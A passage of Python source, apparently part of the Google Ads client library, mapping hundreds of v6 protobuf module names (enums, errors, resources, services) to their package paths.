"google.ads.google_ads.v6.proto.enums", "display_upload_product_type_pb2": "google.ads.google_ads.v6.proto.enums", "distance_bucket_pb2": "google.ads.google_ads.v6.proto.enums", "dsa_page_feed_criterion_field_pb2": "google.ads.google_ads.v6.proto.enums", "education_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "extension_setting_device_pb2": "google.ads.google_ads.v6.proto.enums", "extension_type_pb2": "google.ads.google_ads.v6.proto.enums", "external_conversion_source_pb2": "google.ads.google_ads.v6.proto.enums", "feed_attribute_type_pb2": "google.ads.google_ads.v6.proto.enums", "feed_item_quality_approval_status_pb2": "google.ads.google_ads.v6.proto.enums", "feed_item_quality_disapproval_reason_pb2": "google.ads.google_ads.v6.proto.enums", "feed_item_set_status_pb2": "google.ads.google_ads.v6.proto.enums", "feed_item_set_string_filter_type_pb2": "google.ads.google_ads.v6.proto.enums", "feed_item_status_pb2": "google.ads.google_ads.v6.proto.enums", "feed_item_target_device_pb2": "google.ads.google_ads.v6.proto.enums", "feed_item_target_status_pb2": "google.ads.google_ads.v6.proto.enums", "feed_item_target_type_pb2": "google.ads.google_ads.v6.proto.enums", "feed_item_validation_status_pb2": "google.ads.google_ads.v6.proto.enums", "feed_link_status_pb2": "google.ads.google_ads.v6.proto.enums", "feed_mapping_criterion_type_pb2": "google.ads.google_ads.v6.proto.enums", "feed_mapping_status_pb2": "google.ads.google_ads.v6.proto.enums", "feed_origin_pb2": "google.ads.google_ads.v6.proto.enums", "feed_status_pb2": "google.ads.google_ads.v6.proto.enums", "flight_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "frequency_cap_event_type_pb2": "google.ads.google_ads.v6.proto.enums", "frequency_cap_level_pb2": "google.ads.google_ads.v6.proto.enums", "frequency_cap_time_unit_pb2": "google.ads.google_ads.v6.proto.enums", "gender_type_pb2": "google.ads.google_ads.v6.proto.enums", "geo_target_constant_status_pb2": "google.ads.google_ads.v6.proto.enums", "geo_targeting_restriction_pb2": "google.ads.google_ads.v6.proto.enums", "geo_targeting_type_pb2": "google.ads.google_ads.v6.proto.enums", "google_ads_field_category_pb2": "google.ads.google_ads.v6.proto.enums", "google_ads_field_data_type_pb2": "google.ads.google_ads.v6.proto.enums", "google_voice_call_status_pb2": "google.ads.google_ads.v6.proto.enums", "hotel_date_selection_type_pb2": "google.ads.google_ads.v6.proto.enums", "hotel_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "hotel_price_bucket_pb2": "google.ads.google_ads.v6.proto.enums", "hotel_rate_type_pb2": "google.ads.google_ads.v6.proto.enums", "image_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "income_range_type_pb2": "google.ads.google_ads.v6.proto.enums", "interaction_event_type_pb2": "google.ads.google_ads.v6.proto.enums", "interaction_type_pb2": "google.ads.google_ads.v6.proto.enums", "invoice_type_pb2": "google.ads.google_ads.v6.proto.enums", "job_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "keyword_match_type_pb2": "google.ads.google_ads.v6.proto.enums", "keyword_plan_competition_level_pb2": "google.ads.google_ads.v6.proto.enums", "keyword_plan_forecast_interval_pb2": "google.ads.google_ads.v6.proto.enums", "keyword_plan_network_pb2": "google.ads.google_ads.v6.proto.enums", "label_status_pb2": "google.ads.google_ads.v6.proto.enums", "lead_form_call_to_action_type_pb2": "google.ads.google_ads.v6.proto.enums", "lead_form_desired_intent_pb2": "google.ads.google_ads.v6.proto.enums", "lead_form_field_user_input_type_pb2": "google.ads.google_ads.v6.proto.enums", "lead_form_post_submit_call_to_action_type_pb2": "google.ads.google_ads.v6.proto.enums", "legacy_app_install_ad_app_store_pb2": "google.ads.google_ads.v6.proto.enums", "linked_account_type_pb2": "google.ads.google_ads.v6.proto.enums", "listing_group_type_pb2": "google.ads.google_ads.v6.proto.enums", "local_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "location_extension_targeting_criterion_field_pb2": "google.ads.google_ads.v6.proto.enums", "location_group_radius_units_pb2": "google.ads.google_ads.v6.proto.enums", "location_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "location_source_type_pb2": "google.ads.google_ads.v6.proto.enums", "manager_link_status_pb2": "google.ads.google_ads.v6.proto.enums", "matching_function_context_type_pb2": "google.ads.google_ads.v6.proto.enums", "matching_function_operator_pb2": "google.ads.google_ads.v6.proto.enums", "media_type_pb2": "google.ads.google_ads.v6.proto.enums", "merchant_center_link_status_pb2": "google.ads.google_ads.v6.proto.enums", "message_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "mime_type_pb2": "google.ads.google_ads.v6.proto.enums", "minute_of_hour_pb2": "google.ads.google_ads.v6.proto.enums", "mobile_app_vendor_pb2": "google.ads.google_ads.v6.proto.enums", "mobile_device_type_pb2": "google.ads.google_ads.v6.proto.enums", "month_of_year_pb2": "google.ads.google_ads.v6.proto.enums", "negative_geo_target_type_pb2": "google.ads.google_ads.v6.proto.enums", "offline_user_data_job_failure_reason_pb2": "google.ads.google_ads.v6.proto.enums", "offline_user_data_job_status_pb2": "google.ads.google_ads.v6.proto.enums", "offline_user_data_job_type_pb2": "google.ads.google_ads.v6.proto.enums", "operating_system_version_operator_type_pb2": "google.ads.google_ads.v6.proto.enums", "optimization_goal_type_pb2": "google.ads.google_ads.v6.proto.enums", "page_one_promoted_strategy_goal_pb2": "google.ads.google_ads.v6.proto.enums", "parental_status_type_pb2": "google.ads.google_ads.v6.proto.enums", "payment_mode_pb2": "google.ads.google_ads.v6.proto.enums", "placeholder_type_pb2": "google.ads.google_ads.v6.proto.enums", "placement_type_pb2": "google.ads.google_ads.v6.proto.enums", "policy_approval_status_pb2": "google.ads.google_ads.v6.proto.enums", "policy_review_status_pb2": "google.ads.google_ads.v6.proto.enums", "policy_topic_entry_type_pb2": "google.ads.google_ads.v6.proto.enums", "policy_topic_evidence_destination_mismatch_url_type_pb2": "google.ads.google_ads.v6.proto.enums", "policy_topic_evidence_destination_not_working_device_pb2": "google.ads.google_ads.v6.proto.enums", "policy_topic_evidence_destination_not_working_dns_error_type_pb2": "google.ads.google_ads.v6.proto.enums", "positive_geo_target_type_pb2": "google.ads.google_ads.v6.proto.enums", "preferred_content_type_pb2": "google.ads.google_ads.v6.proto.enums", "price_extension_price_qualifier_pb2": "google.ads.google_ads.v6.proto.enums", "price_extension_price_unit_pb2": "google.ads.google_ads.v6.proto.enums", "price_extension_type_pb2": "google.ads.google_ads.v6.proto.enums", "price_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "product_bidding_category_level_pb2": "google.ads.google_ads.v6.proto.enums", "product_bidding_category_status_pb2": "google.ads.google_ads.v6.proto.enums", "product_channel_exclusivity_pb2": "google.ads.google_ads.v6.proto.enums", "product_channel_pb2": "google.ads.google_ads.v6.proto.enums", "product_condition_pb2": "google.ads.google_ads.v6.proto.enums", "product_custom_attribute_index_pb2": "google.ads.google_ads.v6.proto.enums", "product_type_level_pb2": "google.ads.google_ads.v6.proto.enums", "promotion_extension_discount_modifier_pb2": "google.ads.google_ads.v6.proto.enums", "promotion_extension_occasion_pb2": "google.ads.google_ads.v6.proto.enums", "promotion_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "proximity_radius_units_pb2": "google.ads.google_ads.v6.proto.enums", "quality_score_bucket_pb2": "google.ads.google_ads.v6.proto.enums", "reach_plan_ad_length_pb2": "google.ads.google_ads.v6.proto.enums", "reach_plan_age_range_pb2": "google.ads.google_ads.v6.proto.enums", "reach_plan_network_pb2": "google.ads.google_ads.v6.proto.enums", "real_estate_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "recommendation_type_pb2": "google.ads.google_ads.v6.proto.enums", "resource_change_operation_pb2": "google.ads.google_ads.v6.proto.enums", "response_content_type_pb2": "google.ads.google_ads.v6.proto.enums", "search_engine_results_page_type_pb2": "google.ads.google_ads.v6.proto.enums", "search_term_match_type_pb2": "google.ads.google_ads.v6.proto.enums", "search_term_targeting_status_pb2": "google.ads.google_ads.v6.proto.enums", "served_asset_field_type_pb2": "google.ads.google_ads.v6.proto.enums", "shared_set_status_pb2": "google.ads.google_ads.v6.proto.enums", "shared_set_type_pb2": "google.ads.google_ads.v6.proto.enums", "simulation_modification_method_pb2": "google.ads.google_ads.v6.proto.enums", "simulation_type_pb2": "google.ads.google_ads.v6.proto.enums", "sitelink_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "slot_pb2": "google.ads.google_ads.v6.proto.enums", "spending_limit_type_pb2": "google.ads.google_ads.v6.proto.enums", "structured_snippet_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "summary_row_setting_pb2": "google.ads.google_ads.v6.proto.enums", "system_managed_entity_source_pb2": "google.ads.google_ads.v6.proto.enums", "target_cpa_opt_in_recommendation_goal_pb2": "google.ads.google_ads.v6.proto.enums", "target_impression_share_location_pb2": "google.ads.google_ads.v6.proto.enums", "targeting_dimension_pb2": "google.ads.google_ads.v6.proto.enums", "time_type_pb2": "google.ads.google_ads.v6.proto.enums", "tracking_code_page_format_pb2": "google.ads.google_ads.v6.proto.enums", "tracking_code_type_pb2": "google.ads.google_ads.v6.proto.enums", "travel_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "user_identifier_source_pb2": "google.ads.google_ads.v6.proto.enums", "user_interest_taxonomy_type_pb2": "google.ads.google_ads.v6.proto.enums", "user_list_access_status_pb2": "google.ads.google_ads.v6.proto.enums", "user_list_closing_reason_pb2": "google.ads.google_ads.v6.proto.enums", "user_list_combined_rule_operator_pb2": "google.ads.google_ads.v6.proto.enums", "user_list_crm_data_source_type_pb2": "google.ads.google_ads.v6.proto.enums", "user_list_date_rule_item_operator_pb2": "google.ads.google_ads.v6.proto.enums", "user_list_logical_rule_operator_pb2": "google.ads.google_ads.v6.proto.enums", "user_list_membership_status_pb2": "google.ads.google_ads.v6.proto.enums", "user_list_number_rule_item_operator_pb2": "google.ads.google_ads.v6.proto.enums", "user_list_prepopulation_status_pb2": "google.ads.google_ads.v6.proto.enums", "user_list_rule_type_pb2": "google.ads.google_ads.v6.proto.enums", "user_list_size_range_pb2": "google.ads.google_ads.v6.proto.enums", "user_list_string_rule_item_operator_pb2": "google.ads.google_ads.v6.proto.enums", "user_list_type_pb2": "google.ads.google_ads.v6.proto.enums", "vanity_pharma_display_url_mode_pb2": "google.ads.google_ads.v6.proto.enums", "vanity_pharma_text_pb2": "google.ads.google_ads.v6.proto.enums", "webpage_condition_operand_pb2": "google.ads.google_ads.v6.proto.enums", "webpage_condition_operator_pb2": "google.ads.google_ads.v6.proto.enums", "access_invitation_error_pb2": "google.ads.google_ads.v6.proto.errors", "account_budget_proposal_error_pb2": "google.ads.google_ads.v6.proto.errors", "account_link_error_pb2": "google.ads.google_ads.v6.proto.errors", "ad_customizer_error_pb2": "google.ads.google_ads.v6.proto.errors", "ad_error_pb2": "google.ads.google_ads.v6.proto.errors", "ad_group_ad_error_pb2": "google.ads.google_ads.v6.proto.errors", "ad_group_bid_modifier_error_pb2": "google.ads.google_ads.v6.proto.errors", "ad_group_criterion_error_pb2": "google.ads.google_ads.v6.proto.errors", "ad_group_error_pb2": "google.ads.google_ads.v6.proto.errors", "ad_group_feed_error_pb2": "google.ads.google_ads.v6.proto.errors", "ad_parameter_error_pb2": "google.ads.google_ads.v6.proto.errors", "ad_sharing_error_pb2": "google.ads.google_ads.v6.proto.errors", "adx_error_pb2": "google.ads.google_ads.v6.proto.errors", "asset_error_pb2": "google.ads.google_ads.v6.proto.errors", "asset_link_error_pb2": "google.ads.google_ads.v6.proto.errors", "authentication_error_pb2": "google.ads.google_ads.v6.proto.errors", "authorization_error_pb2": "google.ads.google_ads.v6.proto.errors", "batch_job_error_pb2": "google.ads.google_ads.v6.proto.errors", "bidding_error_pb2": "google.ads.google_ads.v6.proto.errors", "bidding_strategy_error_pb2": "google.ads.google_ads.v6.proto.errors", "billing_setup_error_pb2": "google.ads.google_ads.v6.proto.errors", "campaign_budget_error_pb2": "google.ads.google_ads.v6.proto.errors", "campaign_criterion_error_pb2": "google.ads.google_ads.v6.proto.errors", "campaign_draft_error_pb2": "google.ads.google_ads.v6.proto.errors", "campaign_error_pb2": "google.ads.google_ads.v6.proto.errors", "campaign_experiment_error_pb2": "google.ads.google_ads.v6.proto.errors", "campaign_feed_error_pb2": "google.ads.google_ads.v6.proto.errors", "campaign_shared_set_error_pb2": "google.ads.google_ads.v6.proto.errors", "change_event_error_pb2": "google.ads.google_ads.v6.proto.errors", "change_status_error_pb2": "google.ads.google_ads.v6.proto.errors", "collection_size_error_pb2": "google.ads.google_ads.v6.proto.errors", "context_error_pb2": "google.ads.google_ads.v6.proto.errors", "conversion_action_error_pb2": "google.ads.google_ads.v6.proto.errors", "conversion_adjustment_upload_error_pb2": "google.ads.google_ads.v6.proto.errors", "conversion_upload_error_pb2": "google.ads.google_ads.v6.proto.errors", "country_code_error_pb2": "google.ads.google_ads.v6.proto.errors", "criterion_error_pb2": "google.ads.google_ads.v6.proto.errors", "currency_code_error_pb2": "google.ads.google_ads.v6.proto.errors", "custom_audience_error_pb2": "google.ads.google_ads.v6.proto.errors", "custom_interest_error_pb2": "google.ads.google_ads.v6.proto.errors", "customer_client_link_error_pb2": "google.ads.google_ads.v6.proto.errors", "customer_error_pb2": "google.ads.google_ads.v6.proto.errors", "customer_feed_error_pb2": "google.ads.google_ads.v6.proto.errors", "customer_manager_link_error_pb2": "google.ads.google_ads.v6.proto.errors", "customer_user_access_error_pb2": "google.ads.google_ads.v6.proto.errors", "database_error_pb2": "google.ads.google_ads.v6.proto.errors", "date_error_pb2": "google.ads.google_ads.v6.proto.errors", "date_range_error_pb2": "google.ads.google_ads.v6.proto.errors", "distinct_error_pb2": "google.ads.google_ads.v6.proto.errors", "enum_error_pb2": "google.ads.google_ads.v6.proto.errors", "errors_pb2": "google.ads.google_ads.v6.proto.errors", "extension_feed_item_error_pb2": "google.ads.google_ads.v6.proto.errors", "extension_setting_error_pb2": "google.ads.google_ads.v6.proto.errors", "feed_attribute_reference_error_pb2": "google.ads.google_ads.v6.proto.errors", "feed_error_pb2": "google.ads.google_ads.v6.proto.errors", "feed_item_error_pb2": "google.ads.google_ads.v6.proto.errors", "feed_item_set_error_pb2": "google.ads.google_ads.v6.proto.errors", "feed_item_set_link_error_pb2": "google.ads.google_ads.v6.proto.errors", "feed_item_target_error_pb2": "google.ads.google_ads.v6.proto.errors", "feed_item_validation_error_pb2": "google.ads.google_ads.v6.proto.errors", "feed_mapping_error_pb2": "google.ads.google_ads.v6.proto.errors", "field_error_pb2": "google.ads.google_ads.v6.proto.errors", "field_mask_error_pb2": "google.ads.google_ads.v6.proto.errors", "function_error_pb2": "google.ads.google_ads.v6.proto.errors", "function_parsing_error_pb2": "google.ads.google_ads.v6.proto.errors", "geo_target_constant_suggestion_error_pb2": "google.ads.google_ads.v6.proto.errors", "header_error_pb2": "google.ads.google_ads.v6.proto.errors", "id_error_pb2": "google.ads.google_ads.v6.proto.errors", "image_error_pb2": "google.ads.google_ads.v6.proto.errors", "internal_error_pb2": "google.ads.google_ads.v6.proto.errors", "invoice_error_pb2": "google.ads.google_ads.v6.proto.errors", "keyword_plan_ad_group_error_pb2": "google.ads.google_ads.v6.proto.errors", "keyword_plan_ad_group_keyword_error_pb2": "google.ads.google_ads.v6.proto.errors", "keyword_plan_campaign_error_pb2": "google.ads.google_ads.v6.proto.errors", "keyword_plan_campaign_keyword_error_pb2": "google.ads.google_ads.v6.proto.errors", "keyword_plan_error_pb2": "google.ads.google_ads.v6.proto.errors", "keyword_plan_idea_error_pb2": "google.ads.google_ads.v6.proto.errors", "label_error_pb2": "google.ads.google_ads.v6.proto.errors", "language_code_error_pb2": "google.ads.google_ads.v6.proto.errors", "list_operation_error_pb2": "google.ads.google_ads.v6.proto.errors", "manager_link_error_pb2": "google.ads.google_ads.v6.proto.errors", "media_bundle_error_pb2": "google.ads.google_ads.v6.proto.errors", "media_file_error_pb2": "google.ads.google_ads.v6.proto.errors", "media_upload_error_pb2": "google.ads.google_ads.v6.proto.errors", "multiplier_error_pb2": "google.ads.google_ads.v6.proto.errors", "mutate_error_pb2": "google.ads.google_ads.v6.proto.errors", "new_resource_creation_error_pb2": "google.ads.google_ads.v6.proto.errors", "not_allowlisted_error_pb2": "google.ads.google_ads.v6.proto.errors", "not_empty_error_pb2": "google.ads.google_ads.v6.proto.errors", "null_error_pb2": "google.ads.google_ads.v6.proto.errors", "offline_user_data_job_error_pb2": "google.ads.google_ads.v6.proto.errors", "operation_access_denied_error_pb2": "google.ads.google_ads.v6.proto.errors", "operator_error_pb2": "google.ads.google_ads.v6.proto.errors", "partial_failure_error_pb2": "google.ads.google_ads.v6.proto.errors", "payments_account_error_pb2": "google.ads.google_ads.v6.proto.errors", "policy_finding_error_pb2": "google.ads.google_ads.v6.proto.errors", "policy_validation_parameter_error_pb2": "google.ads.google_ads.v6.proto.errors", "policy_violation_error_pb2": "google.ads.google_ads.v6.proto.errors", "query_error_pb2": "google.ads.google_ads.v6.proto.errors", "quota_error_pb2": "google.ads.google_ads.v6.proto.errors", "range_error_pb2": "google.ads.google_ads.v6.proto.errors", "reach_plan_error_pb2": "google.ads.google_ads.v6.proto.errors", "recommendation_error_pb2": "google.ads.google_ads.v6.proto.errors", "region_code_error_pb2": "google.ads.google_ads.v6.proto.errors", "request_error_pb2": "google.ads.google_ads.v6.proto.errors", "resource_access_denied_error_pb2": "google.ads.google_ads.v6.proto.errors", "resource_count_limit_exceeded_error_pb2": "google.ads.google_ads.v6.proto.errors", "setting_error_pb2": "google.ads.google_ads.v6.proto.errors", "shared_criterion_error_pb2": "google.ads.google_ads.v6.proto.errors", "shared_set_error_pb2": "google.ads.google_ads.v6.proto.errors", "size_limit_error_pb2": "google.ads.google_ads.v6.proto.errors", "string_format_error_pb2": "google.ads.google_ads.v6.proto.errors", "string_length_error_pb2": "google.ads.google_ads.v6.proto.errors", "third_party_app_analytics_link_error_pb2": "google.ads.google_ads.v6.proto.errors", "time_zone_error_pb2": "google.ads.google_ads.v6.proto.errors", "url_field_error_pb2": "google.ads.google_ads.v6.proto.errors", "user_data_error_pb2": "google.ads.google_ads.v6.proto.errors", "user_list_error_pb2": "google.ads.google_ads.v6.proto.errors", "youtube_video_registration_error_pb2": "google.ads.google_ads.v6.proto.errors", "account_budget_pb2": "google.ads.google_ads.v6.proto.resources", "account_budget_proposal_pb2": "google.ads.google_ads.v6.proto.resources", "account_link_pb2": "google.ads.google_ads.v6.proto.resources", "ad_group_ad_asset_view_pb2": "google.ads.google_ads.v6.proto.resources", "ad_group_ad_label_pb2": "google.ads.google_ads.v6.proto.resources", "ad_group_ad_pb2": "google.ads.google_ads.v6.proto.resources", "ad_group_audience_view_pb2": "google.ads.google_ads.v6.proto.resources", "ad_group_bid_modifier_pb2": "google.ads.google_ads.v6.proto.resources", "ad_group_criterion_label_pb2": "google.ads.google_ads.v6.proto.resources", "ad_group_criterion_pb2": "google.ads.google_ads.v6.proto.resources", "ad_group_criterion_simulation_pb2": "google.ads.google_ads.v6.proto.resources", "ad_group_extension_setting_pb2": "google.ads.google_ads.v6.proto.resources", "ad_group_feed_pb2": "google.ads.google_ads.v6.proto.resources", "ad_group_label_pb2": "google.ads.google_ads.v6.proto.resources", "ad_group_pb2": "google.ads.google_ads.v6.proto.resources", "ad_group_simulation_pb2": "google.ads.google_ads.v6.proto.resources", "ad_parameter_pb2": "google.ads.google_ads.v6.proto.resources", "ad_pb2": "google.ads.google_ads.v6.proto.resources", "ad_schedule_view_pb2": "google.ads.google_ads.v6.proto.resources", "age_range_view_pb2": "google.ads.google_ads.v6.proto.resources", "asset_pb2": "google.ads.google_ads.v6.proto.resources", "batch_job_pb2": "google.ads.google_ads.v6.proto.resources", "bidding_strategy_pb2": "google.ads.google_ads.v6.proto.resources", "billing_setup_pb2": "google.ads.google_ads.v6.proto.resources", "call_view_pb2": "google.ads.google_ads.v6.proto.resources", "campaign_asset_pb2": "google.ads.google_ads.v6.proto.resources", "campaign_audience_view_pb2": "google.ads.google_ads.v6.proto.resources", "campaign_bid_modifier_pb2": "google.ads.google_ads.v6.proto.resources", "campaign_budget_pb2": "google.ads.google_ads.v6.proto.resources", "campaign_criterion_pb2": "google.ads.google_ads.v6.proto.resources", "campaign_criterion_simulation_pb2": "google.ads.google_ads.v6.proto.resources", "campaign_draft_pb2": "google.ads.google_ads.v6.proto.resources", "campaign_experiment_pb2": "google.ads.google_ads.v6.proto.resources", "campaign_extension_setting_pb2": "google.ads.google_ads.v6.proto.resources", "campaign_feed_pb2": "google.ads.google_ads.v6.proto.resources", "campaign_label_pb2": "google.ads.google_ads.v6.proto.resources", "campaign_pb2": "google.ads.google_ads.v6.proto.resources", "campaign_shared_set_pb2": "google.ads.google_ads.v6.proto.resources", "carrier_constant_pb2": "google.ads.google_ads.v6.proto.resources", "change_event_pb2": "google.ads.google_ads.v6.proto.resources", "change_status_pb2": "google.ads.google_ads.v6.proto.resources", "click_view_pb2": "google.ads.google_ads.v6.proto.resources", "combined_audience_pb2": "google.ads.google_ads.v6.proto.resources", "conversion_action_pb2": "google.ads.google_ads.v6.proto.resources", "currency_constant_pb2": "google.ads.google_ads.v6.proto.resources", "custom_audience_pb2": "google.ads.google_ads.v6.proto.resources", "custom_interest_pb2": "google.ads.google_ads.v6.proto.resources", "customer_client_link_pb2": "google.ads.google_ads.v6.proto.resources", "customer_client_pb2": "google.ads.google_ads.v6.proto.resources", "customer_extension_setting_pb2": "google.ads.google_ads.v6.proto.resources", "customer_feed_pb2": "google.ads.google_ads.v6.proto.resources", "customer_label_pb2": "google.ads.google_ads.v6.proto.resources", "customer_manager_link_pb2": "google.ads.google_ads.v6.proto.resources", "customer_negative_criterion_pb2": "google.ads.google_ads.v6.proto.resources", "customer_pb2": "google.ads.google_ads.v6.proto.resources", "customer_user_access_invitation_pb2": "google.ads.google_ads.v6.proto.resources", "customer_user_access_pb2": "google.ads.google_ads.v6.proto.resources", "detail_placement_view_pb2": "google.ads.google_ads.v6.proto.resources", "display_keyword_view_pb2": "google.ads.google_ads.v6.proto.resources", "distance_view_pb2": "google.ads.google_ads.v6.proto.resources", "domain_category_pb2": "google.ads.google_ads.v6.proto.resources", "dynamic_search_ads_search_term_view_pb2": "google.ads.google_ads.v6.proto.resources", "expanded_landing_page_view_pb2": "google.ads.google_ads.v6.proto.resources", "extension_feed_item_pb2": "google.ads.google_ads.v6.proto.resources", "feed_item_pb2": "google.ads.google_ads.v6.proto.resources", "feed_item_set_link_pb2": "google.ads.google_ads.v6.proto.resources", "feed_item_set_pb2": "google.ads.google_ads.v6.proto.resources", "feed_item_target_pb2": "google.ads.google_ads.v6.proto.resources", "feed_mapping_pb2": "google.ads.google_ads.v6.proto.resources", "feed_pb2": "google.ads.google_ads.v6.proto.resources", "feed_placeholder_view_pb2": "google.ads.google_ads.v6.proto.resources", "gender_view_pb2": "google.ads.google_ads.v6.proto.resources", "geo_target_constant_pb2": "google.ads.google_ads.v6.proto.resources", "geographic_view_pb2": "google.ads.google_ads.v6.proto.resources", "google_ads_field_pb2": "google.ads.google_ads.v6.proto.resources", "group_placement_view_pb2": "google.ads.google_ads.v6.proto.resources", "hotel_group_view_pb2": "google.ads.google_ads.v6.proto.resources", "hotel_performance_view_pb2": "google.ads.google_ads.v6.proto.resources", "income_range_view_pb2": "google.ads.google_ads.v6.proto.resources", "invoice_pb2": "google.ads.google_ads.v6.proto.resources", "keyword_plan_ad_group_keyword_pb2": "google.ads.google_ads.v6.proto.resources", "keyword_plan_ad_group_pb2": "google.ads.google_ads.v6.proto.resources", "keyword_plan_campaign_keyword_pb2": "google.ads.google_ads.v6.proto.resources", "keyword_plan_campaign_pb2": "google.ads.google_ads.v6.proto.resources", "keyword_plan_pb2": "google.ads.google_ads.v6.proto.resources", "keyword_view_pb2": "google.ads.google_ads.v6.proto.resources", "label_pb2": "google.ads.google_ads.v6.proto.resources", "landing_page_view_pb2": "google.ads.google_ads.v6.proto.resources", "language_constant_pb2": "google.ads.google_ads.v6.proto.resources", "location_view_pb2": "google.ads.google_ads.v6.proto.resources", "managed_placement_view_pb2": "google.ads.google_ads.v6.proto.resources", "media_file_pb2": "google.ads.google_ads.v6.proto.resources", "merchant_center_link_pb2": "google.ads.google_ads.v6.proto.resources", "mobile_app_category_constant_pb2": "google.ads.google_ads.v6.proto.resources", "mobile_device_constant_pb2": "google.ads.google_ads.v6.proto.resources", "offline_user_data_job_pb2": "google.ads.google_ads.v6.proto.resources", "operating_system_version_constant_pb2": "google.ads.google_ads.v6.proto.resources", "paid_organic_search_term_view_pb2": "google.ads.google_ads.v6.proto.resources", "parental_status_view_pb2": "google.ads.google_ads.v6.proto.resources", "payments_account_pb2": "google.ads.google_ads.v6.proto.resources", "product_bidding_category_constant_pb2": "google.ads.google_ads.v6.proto.resources", "product_group_view_pb2": "google.ads.google_ads.v6.proto.resources", "recommendation_pb2": "google.ads.google_ads.v6.proto.resources", "remarketing_action_pb2": "google.ads.google_ads.v6.proto.resources", "search_term_view_pb2": "google.ads.google_ads.v6.proto.resources", "shared_criterion_pb2": "google.ads.google_ads.v6.proto.resources", "shared_set_pb2": "google.ads.google_ads.v6.proto.resources", "shopping_performance_view_pb2": "google.ads.google_ads.v6.proto.resources", "third_party_app_analytics_link_pb2": "google.ads.google_ads.v6.proto.resources", "topic_constant_pb2": "google.ads.google_ads.v6.proto.resources", "topic_view_pb2": "google.ads.google_ads.v6.proto.resources", "user_interest_pb2": "google.ads.google_ads.v6.proto.resources", "user_list_pb2": "google.ads.google_ads.v6.proto.resources", "user_location_view_pb2": "google.ads.google_ads.v6.proto.resources", "video_pb2": "google.ads.google_ads.v6.proto.resources", "account_budget_proposal_service_pb2": "google.ads.google_ads.v6.proto.services", "account_budget_service_pb2": "google.ads.google_ads.v6.proto.services", "account_link_service_pb2": "google.ads.google_ads.v6.proto.services", "ad_group_ad_asset_view_service_pb2": "google.ads.google_ads.v6.proto.services", "ad_group_ad_label_service_pb2": "google.ads.google_ads.v6.proto.services", "ad_group_ad_service_pb2": "google.ads.google_ads.v6.proto.services", "ad_group_audience_view_service_pb2": "google.ads.google_ads.v6.proto.services", "ad_group_bid_modifier_service_pb2": "google.ads.google_ads.v6.proto.services", "ad_group_criterion_label_service_pb2": "google.ads.google_ads.v6.proto.services", "ad_group_criterion_service_pb2": "google.ads.google_ads.v6.proto.services", "ad_group_criterion_simulation_service_pb2": "google.ads.google_ads.v6.proto.services", "ad_group_extension_setting_service_pb2": "google.ads.google_ads.v6.proto.services", "ad_group_feed_service_pb2": "google.ads.google_ads.v6.proto.services", "ad_group_label_service_pb2": "google.ads.google_ads.v6.proto.services", "ad_group_service_pb2": "google.ads.google_ads.v6.proto.services", "ad_group_simulation_service_pb2": "google.ads.google_ads.v6.proto.services", "ad_parameter_service_pb2": "google.ads.google_ads.v6.proto.services", "ad_schedule_view_service_pb2": "google.ads.google_ads.v6.proto.services", "ad_service_pb2": "google.ads.google_ads.v6.proto.services", "age_range_view_service_pb2": "google.ads.google_ads.v6.proto.services", "asset_service_pb2": "google.ads.google_ads.v6.proto.services", "batch_job_service_pb2": "google.ads.google_ads.v6.proto.services", "bidding_strategy_service_pb2": "google.ads.google_ads.v6.proto.services", "billing_setup_service_pb2": "google.ads.google_ads.v6.proto.services", "campaign_asset_service_pb2": "google.ads.google_ads.v6.proto.services", "campaign_audience_view_service_pb2": "google.ads.google_ads.v6.proto.services", "campaign_bid_modifier_service_pb2": "google.ads.google_ads.v6.proto.services", "campaign_budget_service_pb2": "google.ads.google_ads.v6.proto.services", "campaign_criterion_service_pb2": "google.ads.google_ads.v6.proto.services", "campaign_criterion_simulation_service_pb2": "google.ads.google_ads.v6.proto.services", "campaign_draft_service_pb2": "google.ads.google_ads.v6.proto.services", "campaign_experiment_service_pb2": "google.ads.google_ads.v6.proto.services", "campaign_extension_setting_service_pb2": "google.ads.google_ads.v6.proto.services", "campaign_feed_service_pb2": "google.ads.google_ads.v6.proto.services", "campaign_label_service_pb2": "google.ads.google_ads.v6.proto.services", "campaign_service_pb2": "google.ads.google_ads.v6.proto.services", "campaign_shared_set_service_pb2": "google.ads.google_ads.v6.proto.services", "carrier_constant_service_pb2": "google.ads.google_ads.v6.proto.services", "change_status_service_pb2": "google.ads.google_ads.v6.proto.services", "click_view_service_pb2": "google.ads.google_ads.v6.proto.services", "combined_audience_service_pb2": "google.ads.google_ads.v6.proto.services", "conversion_action_service_pb2": "google.ads.google_ads.v6.proto.services", "conversion_adjustment_upload_service_pb2": "google.ads.google_ads.v6.proto.services", "conversion_upload_service_pb2": "google.ads.google_ads.v6.proto.services", "currency_constant_service_pb2": "google.ads.google_ads.v6.proto.services", "custom_audience_service_pb2": "google.ads.google_ads.v6.proto.services", "custom_interest_service_pb2": "google.ads.google_ads.v6.proto.services", "customer_client_link_service_pb2": "google.ads.google_ads.v6.proto.services", "customer_client_service_pb2": "google.ads.google_ads.v6.proto.services", "customer_extension_setting_service_pb2": "google.ads.google_ads.v6.proto.services", "customer_feed_service_pb2": "google.ads.google_ads.v6.proto.services", "customer_label_service_pb2": "google.ads.google_ads.v6.proto.services", "customer_manager_link_service_pb2": "google.ads.google_ads.v6.proto.services", "customer_negative_criterion_service_pb2": "google.ads.google_ads.v6.proto.services", "customer_service_pb2": "google.ads.google_ads.v6.proto.services", "customer_user_access_invitation_service_pb2": "google.ads.google_ads.v6.proto.services", "customer_user_access_service_pb2": "google.ads.google_ads.v6.proto.services", "detail_placement_view_service_pb2": "google.ads.google_ads.v6.proto.services", "display_keyword_view_service_pb2": "google.ads.google_ads.v6.proto.services", "distance_view_service_pb2": "google.ads.google_ads.v6.proto.services", "domain_category_service_pb2": 